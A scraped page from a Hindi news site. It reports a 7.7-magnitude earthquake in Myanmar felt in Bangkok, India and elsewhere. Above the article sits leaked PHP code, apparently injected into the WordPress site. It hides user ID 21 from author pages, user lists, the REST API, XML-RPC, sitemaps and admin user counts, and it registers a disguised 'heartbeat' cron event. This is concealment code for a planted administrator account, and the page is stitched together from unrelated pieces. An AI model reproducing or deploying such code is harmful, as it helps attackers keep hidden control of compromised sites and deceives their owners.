add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
म्यांमार में 7.7 तीव्रता का विनाशकारी भूकंप, बैंकॉक तक महसूस हुए झटके, 20 की मौत - Press Ki Taquat
No Result
View All Result
सुमित जोशी, 28 मार्च 2025 : म्यांमार के मध्य क्षेत्र में शुक्रवार को 7.7 तीव्रता का शक्तिशाली भूकंप आया, जिससे भारी तबाही हुई। झटके बैंकॉक, चीन के युन्नान प्रांत, भारत और बांग्लादेश तक महसूस किए गए। भूकंप का केंद्र सागाइंग के पास, राजधानी नेपीडॉ से लगभग 250 किलोमीटर दूर था।
मंडाले में एक मस्जिद के ढहने से कम से कम 10 लोगों की मौत हो गई। शहर के एक विश्वविद्यालय में आग लग गई, जबकि नेपीडॉ के एक अस्पताल को “बड़ी आपदा क्षेत्र” में बदल दिया गया है। म्यांमार की सैन्य सरकार ने आपातकाल घोषित कर दिया है और अंतरराष्ट्रीय मदद की अपील की है।
बैंकॉक में, एक 30-मंजिला निर्माणाधीन इमारत गिर गई, जिसमें 43 श्रमिक मलबे में फंस गए। थाई प्रशासन ने आपातकाल घोषित कर बचाव अभियान तेज कर दिया है।
म्यांमार और थाईलैंड में बचाव टीमें मलबे में फंसे लोगों को निकालने में जुटी हैं। भारत ने सहायता की पेशकश की है, और कोलकाता व मणिपुर में भी झटके महसूस किए गए। भूकंप से हुए भारी नुकसान के बीच विशेषज्ञों ने आगे और झटकों की चेतावनी दी है।
Post Views: 312
No Result
View All Result